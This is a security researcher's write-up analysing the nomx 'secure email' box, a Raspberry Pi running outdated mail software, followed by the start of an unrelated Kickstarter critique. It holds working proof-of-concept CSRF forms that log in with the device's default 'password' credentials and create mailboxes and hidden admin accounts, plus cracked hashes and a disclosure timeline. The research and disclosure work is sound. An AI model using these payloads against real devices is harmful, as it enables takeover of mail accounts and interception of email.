nomx: The world’s most secure communications protocol

With permission, we have re-posted an article written by Scott Helme on what is possibly one of the weirdest things we’ve seen.

I was recently invited to take part in some research by BBC Click, alongside Professor Alan Woodward, to analyse a device that had quite a lot of people all excited. With slick marketing, catchy tag lines and some pretty bold claims about their security, nomx claim to have cracked email security once and for all. Down the rabbit hole we go!


You can find the official nomx site at and right away you will see how secure this device is.

nomx main site

Everything else is insecure.

The world’s most secure communications protocol

nomx ensures absolute privacy for personal and commercial email and messaging


That’s a lot of pretty big claims for such a small amount of space on the homepage so I was more than happy to get involved in investigating the device. I met with the BBC in London and they provided the retail packaged device that was to become mine for testing purposes. It’s pretty nice looking with some fancy packaging and you’d hope so too with a starting price of $199!

retail box

box open

Starting the investigation

Before I even powered the device on, the first thing I wanted to do was open it up and see what was inside the case. If possible, it’d be nice to take a backup of any flash storage or firmware on the device, both so I could revert if I broke something and as a reference point for how the device was when I received it. I flipped it over and started to open up the case, expecting to find a fairly basic PCB inside. It had micro-USB for power and an Ethernet port on the side, with the box measuring 14cm x 14cm (5.5″ x 5.5″).

top view

micro-USB power

Ethernet port


Now, as soon as I looked at this device I already had a really bad feeling. First of all, through the vent holes on the top I could see that the PCB inside took up only ~25% of the footprint of the device; the case was considerably larger than the board inside it, which seemed odd. Second, the MAC address on the bottom looked familiar, really familiar. Putting that little thought to the back of my mind, I cracked open the case by removing the standard screws in the bottom to confirm my initial suspicion.

case open

raspberry pi

serial number

flashy lights

Turns out that MAC address was really familiar because the prefix is from the Raspberry Pi Foundation. They own the B8-27-EB assignment which you can search for on the IEEE website. Select ‘MAC Address Block Large (MA-L)’ from the drop down menu and filter on ‘Raspberry’.

mac address
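If you want to check a MAC address against an OUI assignment yourself, the comparison only involves the first three octets. A quick sketch (the MAC addresses below are made up for illustration):

```python
def oui(mac: str) -> str:
    """Return the normalised OUI (first three octets) of a MAC address."""
    octets = mac.replace("-", ":").lower().split(":")
    return ":".join(octets[:3])

# IEEE MA-L assignment registered to the Raspberry Pi Foundation
RASPBERRY_PI_OUI = "b8:27:eb"

def is_raspberry_pi(mac: str) -> bool:
    return oui(mac) == RASPBERRY_PI_OUI

print(is_raspberry_pi("B8-27-EB-12-34-56"))  # True
print(is_raspberry_pi("00-1A-2B-12-34-56"))  # False
```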

To be clear, I have absolutely no problem with the Raspberry Pi at all, it’s an awesome little device and I’ve used it in a few projects of my own. I wasn’t however expecting to find one nestled in the corner of a large box that claims to provide a completely secure and proprietary email protocol! Because the device is just a Raspberry Pi under the hood that made taking a backup really easy. I simply popped out the Micro SD card and put it in my card reader and used Win32DiskImager to take a full clone of the card.

Firing up the device

Now I had a backup of the memory card I could go to town on the device itself and not worry about causing irreparable damage. In the worst case scenario I could always flash back to a stock image and start again without any problems. Knowing it was an rPi, I grabbed a spare monitor and keyboard and decided to hook straight up to the device and boot it; I was pretty surprised when it started booting into Raspbian. Once I hit the login prompt I tried the default creds to no avail, and took a few shots at the root password too, no joy. It’s pretty easy to reset the root user password on an rPi though, so I took the card out, tinkered with it on my PC and booted it back up again to a root shell.
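For reference, the usual rPi password-reset trick goes something like this; a sketch from memory, and the exact file layout varies between Raspbian releases:

```text
# On another machine, append to the single kernel command line
# in the boot partition's cmdline.txt:
init=/bin/sh

# Boot the Pi to the resulting root shell, then:
mount -o remount,rw /
passwd root
sync
# Remove init=/bin/sh from cmdline.txt and reboot normally.
```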

pi booting up

logged in as root
Yes, there are a few things to be concerned about in those images, but the main point is I had a root shell, so I could reset the root user password and SSH in to the rPi from my main PC instead of using a crappy monitor and keyboard. I dropped my SSH key in there and also fired up WinSCP from my desktop to take a full dump of the OS contents to work with. The device was running Nginx, so I wanted to find the web root and browse through the source, and I also saw a couple of other programs starting on boot like Dovecot and Postfix. There were quite a few interesting things to look through!

Old software

I wanted to see exactly what was running on the device, so I did a quick run-down of the software that was installed and how it was configured. Here’s the list of what I could find:

  • Raspbian GNU/Linux 7 (wheezy) – last updated 7th May 2015
  • nginx version: nginx/1.2.1 – released 5th June 2012
  • PHP 5.4.45-0+deb7u5 – released 3rd September 2015
  • OpenSSL 1.0.1t – released 3rd May 2016
  • Dovecot 2.1.7 – released 29th May 2012
  • Postfix 2.9.6 – released 4th February 2013
  • MySQL Ver 14.14 Distrib 5.5.52 – released 6th September 2016

It’s interesting to see such outdated versions of software on there; if the device was built even remotely recently, I’m not sure how you’d end up with such seriously old versions installed. I had a look for any auto-update mechanism but couldn’t see anything on there. Perhaps the device will trigger some kind of update later when I go through the setup in the web interface, so all may not be lost just yet. For now, it was interesting to know that everything on there seemed to be pretty standard for your everyday mail server; there were certainly no hints of anything proprietary.

Setup – Server

After my quick dig around at the command line I decided to open up the browser and go through the setup process. You have to get the IP of the device from your router or DHCP server and connect to it in the browser.

login screen

We can’t login just yet though as we don’t have an account on the device so we have to manually navigate to the Setup page…

setup page

Further down the setup page we can create our own ‘superadmin’ account and all we need is the setup password.

setup password

The only problem is I couldn’t find the setup password anywhere so I had to hit the lost password link. This prompts me to create a new setup password and then instructs me to edit a PHP file on the device and paste the password in there!

change the setup password

instructions to add the hash

Now, I’m not sure how someone is supposed to edit this PHP file right now because I can’t see the SSH instructions anywhere nor can I see the setup password anywhere either. To save you all the trouble I extracted the hash of the original password whilst I had SSH access and you can see it here:


It turns out this was pretty easy to break after I had a quick dig in the source to see how they generated the hash.

function generate_setup_password_salt() {  
    $salt = time() . '*' . $_SERVER['REMOTE_ADDR'] . '*' . mt_rand(0,60000);
    $salt = md5($salt);
    return $salt;
}

function encrypt_setup_password($password, $salt) {  
    return $salt . ':' . sha1($salt . ':' . $password);
}

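Given that scheme, the salt sits in the clear before the colon and each guess costs a single SHA-1, so a dictionary attack is trivial. A minimal sketch in Python; the salt and wordlist here are made up for illustration, and I generate the stored value in the example rather than reproduce the real hash:

```python
import hashlib

def encrypt_setup_password(password, salt):
    # Mirrors the PHP: salt . ':' . sha1(salt . ':' . password)
    digest = hashlib.sha1(f"{salt}:{password}".encode()).hexdigest()
    return f"{salt}:{digest}"

def crack(stored, wordlist):
    # The salt is stored in the clear before the first colon,
    # so each candidate password costs a single SHA-1.
    salt, _, digest = stored.partition(":")
    for candidate in wordlist:
        if hashlib.sha1(f"{salt}:{candidate}".encode()).hexdigest() == digest:
            return candidate
    return None

# Illustrative stored value, generated here with a made-up salt:
stored = encrypt_setup_password("death", "0123456789abcdef0123456789abcdef")
print(crack(stored, ["password", "letmein", "death"]))  # death
```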
Soooo, yeah. I also had a dig around in the config file and stumbled over this which is used during the setup process.

$CONF['min_password_length'] = 5;

Anyway, the main point for now was that I managed to crack the setup password, which was ‘death’, with a quick tweet asking for help (I could also have set my own if needed), so I could create an account and login to the device.


With my ‘superadmin’ account created I could now begin the process of setting up my unhackable (not) email server. Interesting that my browser thinks the login page isn’t secure huh.

login screen

Once logged in the site is pretty barren and the only real option is to add my new domain that will be used for my email address.

logged in home screen

So I followed through the instructions and hit the ‘New Domain’ button where I was presented with the following screen.

create domain screen

I’ve no idea why the device can only support domains purchased through GoDaddy (well, actually I do now, more on that later) but I followed the instructions and purchased my domain, inserting the API keys into the screen as requested.

new domain details

At this point I won’t bore you with the rest of the terrible web interface, but you set up a few mailboxes with credentials that can then be configured in your favourite mail client. Everything seems pretty darn standard for “The world’s most secure communications protocol”. The setup instructions also ask me to open a series of ports in my router and forward them to the nomx device:

  • port 26 / TCP
  • port 465 / TCP
  • port 587 / TCP
  • port 993 / TCP
  • port 995 / TCP

These must be the ports for their protocol! (Hint: these are standard email server ports) So, I decided to set my email account up in Thunderbird and sure enough, it didn’t work. I couldn’t for the life of me get this thing to work properly even just sending a basic email until I realised that they don’t ask you to open port 25 in the instructions which is required as the standard SMTP port! I will detail more on what port 26 is for later but once I opened up port 25 I could at least send and receive email. Well, I could almost send and receive email.
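Checking which of those ports are actually answering is a one-liner with a plain TCP connect test. A rough sketch, with the device IP as a placeholder:

```python
import socket

def check_port(host, port, timeout=2.0):
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# The ports nomx asks you to forward, plus 25, which the instructions
# omit even though it is the standard SMTP relay port:
MAIL_PORTS = [25, 26, 465, 587, 993, 995]

# Usage (the host below is a placeholder for the device's LAN IP):
# for port in MAIL_PORTS:
#     print(port, check_port("192.168.1.50", port))
```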

Setup – Client

I use Thunderbird as my local mail client, so I got to work on adding my shiny new and super secure email address. It’s pretty easy going and just requires the usual parameters to set up an email address.

thunderbird setup

Everything looks good, but then something really unexpected happened that I just can’t explain. Contrary to the claims all over the nomx website, Thunderbird is throwing up some warnings telling me that the email server needs a security exception. Shocker.

security exception

The same thing also happens again when I try to send an email!

security exception

Spam Hammer

The only problem with trying to send an email from a dynamic, residential IP address (the default here in the UK) is that you look incredibly ‘spammy’. ISPs and email providers just don’t expect email to be sent from an IP like this and it’s often something that malware would do. As a result, it gets blocked. It doesn’t just go to the Spam Folder either, in a lot of cases the mail is rejected and sent back. This was exactly the case when I tried to send an email to my own Hotmail address and it was immediately returned.

notice from hotmail that mail was returned

This is great news: I can’t send emails from my new super awesome secure email server to anyone with a Microsoft email account because they just return it. The story is pretty similar across the board with the email either being returned or put straight in the spam folder of the recipient. I tried against GMail and a few other large providers and found that not one of them made it to the inbox anywhere. After I got a few emails bounced I thought I’d check to see if my IP had been flagged yet and to my surprise it had already been placed on 3 blacklists!

ip blacklists

This really isn’t good unless you plan on constantly chasing your IP off blacklists or frequently changing your IP address to avoid it being blacklisted too widely. Certainly things we don’t want to be thinking about.

Dynamic DNS

The IP address point above got me thinking: my public IP at home can basically change at any point, and I can power cycle my router and get a new one if I like. This device must have some kind of mechanism to poll a DDNS provider and give me a host name that always resolves to my home address. I could see in the DNS that 2 A records had been set, mail and localmail; one was my public IP and the other was the internal IP assigned to my nomx device (bit of an information leak?). I certainly hadn’t set these so it must have been done for me. I ran grep over the code that powers the web interface and couldn’t find any matches for the subdomains, so I took a guess and dumped out the crontab of the root user, which turned up something.

crontab entries

There was a script being run 60 seconds after the device boots and then again every 15 minutes which certainly sounds like a good candidate for a DDNS client! I dumped the script out which turned out to be a rather hacky python script. In short it did a few things:

  • Read in some config files from /var/nomx which listed public IP, domains etc…
  • Checked to see if current public IP and other variables matched those on disk.
  • If they don’t match it polls the GoDaddy API and sets/updates the DNS records.
  • It also configures some UFW rules to ensure the necessary ports are open.
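The steps above amount to a very ordinary DDNS client. A rough reconstruction of the idea in Python, not the vendor's actual code; the endpoint and sso-key header format are from GoDaddy's public API documentation, and the key, secret and domain are placeholders:

```python
# Sketch of a GoDaddy-backed DDNS update; NOT the script from the device.
import json
import urllib.request

API = "https://api.godaddy.com/v1/domains/{domain}/records/A/{name}"

def build_record(ip, ttl=3600):
    """Body for a GoDaddy A-record PUT: a list of record objects."""
    return [{"data": ip, "ttl": ttl}]

def needs_update(cached_ip, current_ip):
    # The cron script only calls the API when the public IP cached
    # on disk no longer matches the current one.
    return cached_ip != current_ip

def update_a_record(domain, name, ip, key, secret):
    req = urllib.request.Request(
        API.format(domain=domain, name=name),
        data=json.dumps(build_record(ip)).encode(),
        headers={
            "Authorization": f"sso-key {key}:{secret}",
            "Content-Type": "application/json",
        },
        method="PUT",
    )
    urllib.request.urlopen(req)
```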

So, those GoDaddy API tokens that we entered earlier were so the device can use GoDaddy as a DDNS provider! I can’t begin to explain how wrong this is, so I’m not even going to try. It’s dreadful.

The Magic

The ‘trick up the sleeve’ of this device is the ability for 2 people that own one to perform a “handshake” between their devices to setup a secure connection.

To send to other nomx users who have secure accounts on their nomx PES, you will need to create, what we call, a handshake between your nomx device and the other nomx device. You can do this by entering the Public IP of the other nomx device and the email address or domain (if entire domain is hosted on other nomx device).


Now, providing the email address and public IP of the other device didn’t really seem like it was going to help us establish any kind of “handshake”. I was expecting perhaps some kind of out of band communication of a pre-shared key or token for verification but no, nothing. You simply enter the email/domain of the other person and their current IP address (that they have to find from somewhere).

handshake screen

Once I’ve entered those details I’m returned to the main screen where I now have an entry representing the “handshake” I just did.

the new handshake

The weird thing is that absolutely nothing happened on the network when I did this. Nothing. There was no outbound traffic of any kind, and yes, I’ve tried it with valid details in the fields, but I can also confirm that nothing happens by looking at the source code. Nothing happened when I did this because nothing was supposed to happen. The entire create-handshake.php file is only 64 lines long. Of those, over 20 are whitespace or comments, and a few more are includes of the header/footer etc… The only thing of any significance that takes place in this file is that a new row is inserted into the database in the handshake table. Sure enough, I now had an entry in a table called handshake on the device.

handshake table dump

The only problem was that after running grep over the code directory I couldn’t find any instances of where this is used other than when you create the handshake or when they are listed on the main page. None of the rest of the code makes reference to it. It did seem odd though that the default SMTP port is 25 and there was a reference here for port 26, which is listed in the nomx documentation as the port required “For nomx to nomx communication”. As I was already well on my way to believing this was just a bog-standard mail server installed on a Raspberry Pi inside a big case, doing absolutely nothing fancy, I relied on some of my Postfix knowledge and started to dig around in the Postfix config directories. Inside /etc/postfix/mysql I did find a file called which contained the following.

user = postfixadmin  
password = death  
hosts =  
dbname = postfixadmin  
query = SELECT CONCAT(smtp,destination,port) FROM handshake WHERE domain = '%s'  

This appears to be doing something like what we want and is taking the smtp, destination and port columns and joining them together. Looking at my earlier output from the handshake table that’d give me something like smtp: which would mean it was sending emails to port 26 at the destination and not port 25. After running over the entire postfix directory with grep though I couldn’t find anywhere that this config file was mentioned, I would have expected to see it referenced in but no. To see what postfix was doing on port 26 I had a look at and sure enough, there was something defined for port 26.

smtp      inet  n       -       -       -       -       smtpd  
26        inet  n       -       -       -       -       smtpd  
  -o syslog_name=postfix/handshake
  -o smtpd_use_tls=yes
  -o smtpd_tls_security_level=encrypt
  -o smtpd_sasl_auth_enable=no
  -o smtpd_enforce_tls=yes
#  -o milter_macro_daemon_name=ORIGINATING
submission inet n       -       -       -       -       smtpd  
  -o syslog_name=postfix/endUser
  -o smtpd_tls_security_level=encrypt
  -o smtpd_sasl_auth_enable=yes
  -o smtpd_client_restrictions=permit_sasl_authenticated,reject
  -o milter_macro_daemon_name=ORIGINATING
smtps     inet  n       -       -       -       -       smtpd  
  -o syslog_name=postfix/smtps
  -o smtpd_tls_security_level=encrypt
  -o smtpd_tls_wrappermode=yes
  -o smtpd_sasl_auth_enable=yes
  -o smtpd_client_restrictions=permit_sasl_authenticated,reject
  -o milter_macro_daemon_name=ORIGINATING

So, it certainly looks like it’s doing something on port 26, although nothing out of the ordinary. To try and solve it and provide conclusive proof, we set up 2 nomx devices and went through the handshake procedure. We then closed port 26 on the firewall and tried to send an email. If the device actually uses port 26 then the email will fail; if it uses port 25 it will send just fine. After testing this the email did fail to send, so it does mean that it is sending to port 26, which is of absolutely no benefit whatsoever. The other interesting point this raised was that the IP address is hard-coded into the database and never updates, so as soon as the IP of the other party changes, everything will break.
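For what it’s worth, the concatenated lookup result is just a Postfix transport-style entry. A hypothetical example of what a handshaked domain might resolve to (the IP is a documentation address, not a real handshake entry):

```text
# Hypothetical transport lookup result for a handshaked domain:
example.com    smtp:[203.0.113.5]:26
```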

Web app testing

The next item on my list was the web application and having access to the source code made this a whole lot easier to test. After a cursory skim I could see that it was vulnerable to XSS and CSRF in countless places. This alone presented a pretty significant risk given that the web interface is effectively used to control the mail server.

injecting marquee tags

With the ability to abuse CSRF you can carry out any action that is present in the web interface, which includes adding and removing domains, adding and deleting mailboxes, and adding and configuring an SMTP mail relay… Just think about that one for a second. To prove the device was vulnerable to CSRF, beyond seeing there were no mitigations in the code, I fired up Fiddler and crafted an HTTP request to create a new mailbox with my session ID.

Cookie: PHPSESSID=39r4bb36385te1seds0dgtpt87  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 127


This created a new mailbox for and set the user credentials so I could now login to send and receive emails from this address. This means I can now create arbitrary mailboxes on your domain and then send and receive emails from them. That’s pretty devastating when I can create anything I want like sales@, billing@, ceo@ or any one of the countless and highly offensive names I can think of to then send emails from your domain. Of course, with the ability to create a mailbox comes the ability to delete a mailbox, which I can also do with CSRF. Launching this attack is pretty easy: I created a basic page to provide my personal details for the handshake and could simply direct a nomx user there. If they want to set up a handshake they will view the page that contains my details, and the CSRF attack, and then login to their nomx device, allowing for successful delivery. I wanted to take this one step further though and not have the user do anything at all. I wanted them to simply visit a page, even for a brief second, and have their device totally compromised. Turns out it wasn’t that hard…

Undocumented admin account

After delving into the database on the device and browsing through a few tables, I saw something that horrified me. There was another admin account alongside my own that I hadn’t created.

mysql> select * from admin;  
+----------+------------------------------------+---------------------+---------------------+--------+
| username | password                           | created             | modified            | active |
+----------+------------------------------------+---------------------+---------------------+--------+
|          | $1$d2242313$UJ6TolBZXSQQvrXvlMZO2/ | 2015-10-10 18:31:30 | 2016-10-24 21:35:46 |      1 |
|          | $1$7d33f257$qxWGsOPg1PX6Axu.NoNaK0 | 2017-03-13 17:24:05 | 2017-03-13 17:24:05 |      1 |
+----------+------------------------------------+---------------------+---------------------+--------+

I extracted the hash and posted it to Twitter to see if I could crowd-source the input and it didn’t take very long for someone to come back to me with the answer.

The password was, quite literally, “password”. Sure enough I immediately opened up the web interface and I could indeed login with the username and the password password. I had full control of the device. This is inexplicably bad for more reasons than I care to list but coupled with the above CSRF attack I now don’t need to depend on the user to be logged in to the device to perform administrative functions, I can simply login to the device with these admin credentials and do anything I like. All this requires is two simple iframes on a page.

<script src="" integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8=" crossorigin="anonymous"></script>  
<form action="" method="POST" id="login" name="login">  
<input type="hidden" value="" name="fUsername" id="fUsername"/>  
<input type="hidden" value="password" name="fPassword" id="fPassword"/>  
<input type="submit" value="Login">  
</form>  
<script>  
$(document).ready(function(e) {
    setTimeout(function() {$('#login').submit();},1000);
});  
</script>  

<script src="" integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8=" crossorigin="anonymous"></script>  
<form action="" method="POST" id="mailbox" name="mailbox">  
<input type="hidden" value="csrf" name="fUsername" id="fUsername"/>  
<input type="hidden" value="" name="fDomain" id="fDomain"/>  
<input type="hidden" value="password" name="fPassword" id="fPassword"/>  
<input type="hidden" value="password" name="fPassword2" id="fPassword2"/>  
<input type="hidden" value="csrf" name="fName" id="fName"/>  
<input type="hidden" value="on" name="fActive" id="fActive"/>  
<input type="hidden" value="on" name="fMail" id="fMail"/>  
</form>  
<script>  
$(document).ready(function(e) {
    setTimeout(function() {$('#mailbox').submit();},3000);
});  
</script>  
I owe a thanks to Paul for helping me perfect the payload here; I was tackling it the wrong way until he gave me this much easier solution. With these two iframes embedded on a page, if I can get a nomx user to visit it, they will first be authenticated to their nomx device and a new mailbox of my choosing will then be created. I can then login to my brand new mail account on that domain and use it. You can also change the password of existing mailboxes, because the interface doesn’t ask for the current password to change it, allowing me access to all of your emails. You can configure an outbound mail relay for the device to intercept future communications, and a whole bunch more. All an attacker needs to do with this is know the IP of the nomx device. Given that you can get the client’s internal IP address thanks to the WebRTC extension of HTML5, iterating through the rest of what is probably a class C address space is easy and can be done in a flash. Let’s not forget the nomx device also sets a localmail subdomain in DNS that contains the internal IP of the device! This is about as bad as it can get and results in total compromise of the device for simply visiting a single webpage for a second or so, no user action required.
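The ‘iterate the class C’ step really is trivial. A sketch using Python’s ipaddress module, with a placeholder leaked IP:

```python
# Enumerate candidate device IPs once WebRTC has leaked the victim's
# internal address; the address below is a placeholder.
import ipaddress

def candidate_hosts(leaked_ip):
    """Yield every other host address in the leaked IP's /24."""
    network = ipaddress.ip_network(f"{leaked_ip}/24", strict=False)
    for host in network.hosts():
        if str(host) != leaked_ip:
            yield str(host)

hosts = list(candidate_hosts("192.168.1.37"))
print(len(hosts))  # 253 candidates to probe
print(hosts[0])    # 192.168.1.1
```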

Update: Doing an update like this, prior to publication, is a little unusual because I’d normally just make the changes and not need to mention the update as the article isn’t finished yet. I’ve decided to add an “update” though to show you an interesting few steps in the process that I had to go through. I was a bit confused about how the whole setup process would work for a user receiving one of these devices, I had to extract and crack a hash to get it to work. I’ve seen poor documentation for new devices before, something that can be forgiven, but I soon learnt that my device didn’t come with any paper documentation and it turns out it should have. I got a copy of the paper documentation and started reading. It also didn’t mention the setup page anywhere because, as it turns out, you aren’t supposed to use it at all. Your username and password to login to the device are listed in the documentation and it’s so bad I had to scan a copy just to show you…

a scan of the quick start guide

So this admin account I’d found was actually supposed to be there!! Not only is this utterly ridiculous, there’s also nothing prompting the user to change this password in the documentation, nor are they required to change it on first login. If the user never changes this password then you can use CSRF to attack the device with the default credentials. Aha, I hear you think, what if they do change the password! Well, it turns out that’s not a problem either…

Creating an undocumented admin account

As I mentioned further up the page, there was the setup.php file that I originally used to create my own account but now seems to be redundant given our default admin account. For my CSRF attack to be 100% reliable though, and work around the user possibly having changed their password (unlikely), I could just create my own admin account on the device via CSRF.

<script src="" integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8=" crossorigin="anonymous"></script>  
<form action="" method="POST" id="admin" name="admin">  
<input type="hidden" value="createadmin" name="form" id="form"/>  
<input type="hidden" value="death" name="setup_password" id="setup_password"/>  
<input type="hidden" value="" name="fUsername" id="fUsername"/>  
<input type="hidden" value="password" name="fPassword" id="fPassword"/>  
<input type="hidden" value="password" name="fPassword2" id="fPassword2"/>  
</form>  
<script>  
$(document).ready(function(e) {
    setTimeout(function() {$('#admin').submit();},1000);
});  
</script>  

This will now create me a brand new admin account on the nomx device that is completely undetectable to the end user, as there is nowhere to view/edit admin accounts on the device. I can now use this admin account for any subsequent CSRF attacks and be sure that the credentials will work and allow me to authenticate. This allows for a full compromise of any nomx device by an external attacker via CSRF; a local attacker on the network can either authenticate with the default account or create themselves an admin account to login with…

Other issues

There were a few other issues I came across whilst testing this device, some of which would be simple to fix and others not so much.

  • There are no automatic updates configured anywhere on this device that I can find. It’s running hideously outdated software and there appears to be no mechanism to update it at all.
  • The device doesn’t setup and configure SPF, DKIM or DMARC, which a good email provider/server should do.
  • The Relay Settings page writes user input into a config file without any sanitisation. This config file is then read in by Postfix. At a minimum I’ve managed to corrupt the config so Postfix won’t start but perhaps there is an additional attack vector here.
  • The code is riddled with bad examples of how to do things and it seems to have been developed by one guy called ‘shawn’, whose name appears throughout. They narrowly avoided one persistent XSS vulnerability by stripping tags, followed by the comment /* should we even bother? */.
  • There are a lot of edited and half baked files where the .php extension has been changed, presumably to stop them being visited in the browser. What this results in is the browser simply downloading the files instead.
  • The device uses self-signed certs throughout and they aren’t even device specific. It’s using the default ssl-cert-snakeoil.pem and ssl-cert-snakeoil.key in the Postfix config.
  • Their main company website has the theme’s default 404 page with links to download it and to the Gantry theme framework:
  • They also have a publicly accessible Joomla login, though I’ve not done any poking around here:
  • The device depends on the GoDaddy API to update its DNS record, if this changes or goes down/away then you have no mechanism to update DNS. There’s also the issue of the 1 hour DNS TTL when your IP changes which means emails don’t make it through for a short period.
  • The device only sets the 2 subdomains (mail and localmail) in DNS. With no MX record set it’d be wise to set an A record for the bare domain to help with external mail delivery too. Ideally they should just set an MX record…
  • Each user has a configured mailbox size of 10MB and without being able to SSH into the box you can’t change this. Good luck sending any attachments.
  • They have what looks like an old config file on the disk that contains what looks like genuine user credentials.[redacted]77  
  • The root user had various files containing things like the bash and mysql history in the home directory which contained several domains/emails of people who I assume helped to test the device.  
  • The file /var/mail/root contains notification emails going back almost 2 years.
  • There are several files in the web root that have bad extensions so can be directly downloaded in the browser.  
  • How could I not mention security headers! There are a few headers that really should be set here like CSP and XFO at a minimum. Setting others like XCTO and XXP certainly wouldn’t hurt either…
  • There are certain times when the box seems to throw 500 errors for no reason like when you try to access robots.txt, which doesn’t exist.
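For contrast, here’s roughly the minimal set of DNS records you’d expect a mail service to create for inbound delivery and outbound reputation; the values are illustrative, not something nomx produces:

```text
; Illustrative zone fragment -- NOT what nomx configures.
example.com.        IN MX  10 mail.example.com.
mail.example.com.   IN A   203.0.113.5
example.com.        IN TXT "v=spf1 mx -all"
_dmarc.example.com. IN TXT "v=DMARC1; p=quarantine; rua=mailto:dmarc@example.com"
```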

Is this a scam?

It would be very easy to conclude that this is a scam. The device is running standard mail server software running on a Raspberry Pi, most of which is outdated. They have presented at countless tech shows and can be constantly found making bold statements of ‘absolute security’ yet didn’t pick up a CSRF vulnerability in their web interface. Take this snippet for example:

We have things like “secure protocol and device”, this box is using SMTP with self-signed certificates… The “nomx network” and “absolute assurance”… As far as I can tell the company isn’t even eating their own dog food! You might not think they’d want to run some Raspberry Pi in a box in their office, but fear not, they also have a business solution.

business server

business server

On one of the pages on their site, that doesn’t seem like it’s intended to be public just yet (link), they also announce a $10,000 bounty!

bounty offer

Needless to say I will be buying one of those when they release it to claim the bitcoin, assuming the device doesn’t cost $10,000!

One good thing

The only good thing I can say about this product is that it does not create an MX record for your domain, upholding the “no MX” in the name. I’ve no idea why not having an MX record for your domain is a good thing, but, it doesn’t create one nonetheless. The python script that runs every 15 minutes only adds A records for mail and localmail, nothing else. Interestingly, the GoDaddy API client that they use doesn’t support MX records anyway, so I’m not sure if it was built around that limitation or it was a happy coincidence. This means of course that almost no email providers can send emails to you because there is no MX record, which is kind of how email works…

Disclosure Timeline

Following are the details for the disclosure timeline, all times GMT.

14 March 2017 19:22: Initial contact made with and from website.

14 March 2017 19:32: Response from asking for details.

15 March 2017 15:02: Skype call with Will to demo CSRF PoC and highlight various issues. Initially I was told this was a ‘client side issue’ and that I had a ‘problem with caching’ but assured him this was a genuine threat.

18 March 2017 18:10: No followup from Skype call so I emailed to confirm details. Advised I’d like to work to 30 day disclosure policy due to severity of issues.

19 March 2017 23:24: Email from Will advising he would get back to me “in the next couple of days”.

30 March 2017 18:39: No response from Will after 11 days so chased via email.

30 March 2017 22:28: Will claims to have sent a response and has forwarded the same email to me again, which doesn’t arrive.

31 March 2017 00:25: Will copies the text of the previous email into a new email which does arrive. Key points:

  • “We’ve started to update/upgrade/replace any nomx devices which may have been affected by this issue.”
  • “We’ve advised them that they should not use the nomx admin while surfing any other sites which contain malware or were otherwise compromised”
  • “We’ve already completed 100% of the initial notification effort and we are prepared to provide new nomx devices for any affected users free of charge.”
  • “We’ve also checked and, to date, there have been ZERO devices affected by this issue.”
  • “In appreciation, I’d also like to provide you personally with a new nomx device. Just send me your address. Alternatively, we can send you a new header file for the interface which prevents any potential CSRF.”
  • “As we developed and continue to develop nomx, we have had two of the largest security firms provide remote and “in hand” vulnerability assessments on nomx. We are providing them with your findings as well.”

31 March 2017 10:59: Replied to point out inconsistencies in email:

  • There is no apparent update mechanism, asked how to update my device.
  • Asked for a copy of the notification sent to consumers.
  • I’m unsure how they know “ZERO” devices are affected, asked for clarification and details of the investigation.
  • I gave consent for my details to be passed to the 2 penetration testing companies so that they could liaise directly with me if needed.
  • Address provided for shipping replacement device.
  • Asked why advice to not browse multiple sites given if CSRF has been patched.

31 March 2017 16:52: Asked for confirmation of receipt of earlier email given apparent email issues.

4 April 2017 11:13: Asked for confirmation of receipt of earlier email given apparent email issues.

4 April 2017 16:16: Will asked for “a few days” to respond.

11 April 2017 14:13: Will responded asking for a 30 day extension to the disclosure. He also said he would submit a CVE and “credit” me with the finding.

11 April 2017 14:19: I responded asking what the 30 day extension was required for as 100% of users had been notified and a patch or replacement device was available as per prior emails. Given the notification and advice provided the issue should already be considered public. Advised that unless there was a reason for the extension I would disclose as planned.

18 April 2017 12:44: Dan Simmons, Senior Producer of BBC Click, emailed Will to let him know that he would be covering it on the show and revealed that Alan and I were working with him. The email outlined all of our concerns and contained some questions from BBC Click.

20 April 2017 02:07: Will responded: “Thank you and I will be in touch in the next few days – and we can wrap this up.”

26 April 2017 15:00: Publication of this blog post. Outstanding points:

  • I have not yet had shipping confirmation of my new device, despite providing my address.
  • I have not yet received a copy of the notification sent to customers about the issue.
  • There has been no notice on their website or social media about the update/recall/replacement.
  • My device has not received any updates and is still vulnerable.
  • No details have been provided about their investigation to determine no devices were affected.
  • There has been no further response to myself or the BBC.

Additional Notes

It seems that Will has a patent pending for this device which you can read here. The introductory text seems to raise a few questions of its own.

They have various videos on YouTube that contain statements and assertions that raise a few questions: link, link, link

You can catch the full details on BBC Click this weekend on the iPlayer!

I’ve published my full PoC code and the contents of the device’s microSD card in a GitHub repo.

Wifimity compares itself to a 50-year-old computer

Once again we find ourselves with a KickStarter (archive copy) claiming that wireless networks are the sole reason users find themselves compromised.
“Wifimity” promises to produce a “cloak of invisibility” with a device that is “military security level” for at least €77; the campaigners are looking to raise €48,000, or about $54,000 USD.

[Ed: You really ought to read their Kickstarter page, it is a right mess.]

Actually, it’s really two devices: one called “Safebox” which just stores your passwords with authorization via a fingerprint reader; and another called “Shield”, which does the same, but also acts as some sort of VPN tunnel. It is supposed to sit between your device and wireless access point, and it connects itself to a service that the creators operate.

We’re going to ignore the password-only device since it is plausibly functional, and instead focus on the Shield device, where the meat and potatoes are.

Here are some of the features they claim will come with Shield:

  • “anonymous surfing” – It’ll anonymize your IP via something that sounds a lot like NAT.
  • “device cloaking” – It’ll scrub the identifying info off your HTTP requests.  Their use case is device-specific price discrimination.
  • “DNS server” – It’ll blackhole suspicious websites’ IP addresses.  No mention of where they get their blacklist…
  • “anti-virus” – The KickStarter claims that this is still “under construction”.
  • “encrypt your cloud” – Their only substantive stretch goal, they promise the Shield will encrypt all the data you “upload to your cloud”.

This really seems like a keychain version of some previous KickStarters we’ve covered.

These claims are bonkers

We should start off by pointing out that the number of people affected by compromised wireless networks is minuscule, compared to the number affected by corporate or government breaches.

